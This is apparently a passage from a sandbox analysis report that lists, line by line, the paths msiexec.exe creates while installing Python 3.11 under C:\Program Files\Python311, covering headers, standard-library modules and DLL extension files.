Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_compile.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_condvar.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_context.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_dict.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_dtoa.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_emscripten_signal.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_exceptions.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_fileutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_floatobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_format.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_frame.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_function.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_gc.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_genobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_getopt.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_gil.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_global_objects.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_global_strings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_hamt.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_hashtable.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_import.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_initconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_interp.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_interpreteridobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_list.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_long.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_moduleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_namespace.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_object.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_opcode.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_parser.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pathconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pyarena.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pyerrors.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pyhash.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pylifecycle.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pymath.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pymem.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_pystate.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_runtime.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_runtime_init.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_signal.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_sliceobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_strhex.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_structseq.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_symtable.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_sysmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_traceback.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_tuple.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_typeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_ucnhash.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_unicodeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_unionobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\internal\pycore_warnings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\intrcheck.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\iterobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\listobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\longobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\marshal.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\memoryobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\methodobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\modsupport.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\moduleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\object.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\objimpl.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\opcode.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\osdefs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\osmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\patchlevel.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\py_curses.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pybuffer.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pycapsule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pydtrace.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyerrors.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyexpat.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyframe.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyhash.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pylifecycle.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymacconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymacro.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymath.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pymem.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pyport.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pystate.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pystrcmp.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pystrtod.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\Python.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pythonrun.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pythread.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\pytypedefs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\rangeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\setobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\sliceobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\structmember.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\structseq.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\sysmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\token.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\traceback.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\tracemalloc.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\tupleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\typeslots.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\unicodeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\warnings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\weakrefobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\libs
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\libs\python311.lib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\libs\python3.lib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers\myfixes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers\myfixes\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\tomllib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\tomllib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\pgen2
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\pgen2\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\sqlite3
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\sqlite3\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\command
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\command\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xmlrpc
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xmlrpc\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test\testmock
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test\testmock\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\tests
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\tests\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing\dummy
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing\dummy\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\etree
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\etree\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\venv
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\venv\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\multiprocessing\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\wsgiref
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\wsgiref\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ensurepip
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ensurepip\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\re
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\re\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\test\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email\mime
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email\mime\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\fixers\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\parsers
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\parsers\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\tests\data\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\metadata
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\metadata\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\email\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\encodings
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\encodings\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\html
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\html\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\http
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\http\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\unittest\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\fixes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\lib2to3\fixes\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\sax
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\sax\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\zoneinfo
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\zoneinfo\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\pydoc_data
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\pydoc_data\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\dom
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\xml\dom\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\resources
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\resources\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\msilib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\msilib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\importlib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\logging
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\logging\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\urllib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\urllib\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\json
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\json\__pycache__
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_asyncio.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_bz2.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_ctypes.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_decimal.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_elementtree.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_hashlib.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_lzma.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_msi.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_multiprocessing.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_overlapped.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_queue.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_socket.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_sqlite3.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_ssl.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_uuid.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\_zoneinfo.pyd
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__future__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__hello__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\ham\eggs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\__phello__\spam.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_aix_support.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_bootsubprocess.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_collections_abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_compat_pickle.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_compression.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_markupbase.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_osx_support.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_py_abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_pydecimal.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_pyio.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_sitebuiltins.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_strptime.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_threading_local.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\_weakrefset.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\aifc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\antigravity.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\argparse.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ast.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asynchat.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\__main__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_futures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_subprocess.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\base_tasks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\constants.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\coroutines.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\exceptions.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\format_helpers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\futures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\locks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\log.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\mixins.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\proactor_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\protocols.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\queues.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\runners.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\selector_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\sslproto.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\staggered.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\streams.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\subprocess.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\taskgroups.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\tasks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\threads.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\timeouts.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\transports.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\trsock.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\unix_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\windows_events.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncio\windows_utils.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\asyncore.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\base64.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\bdb.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\bisect.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\bz2.py
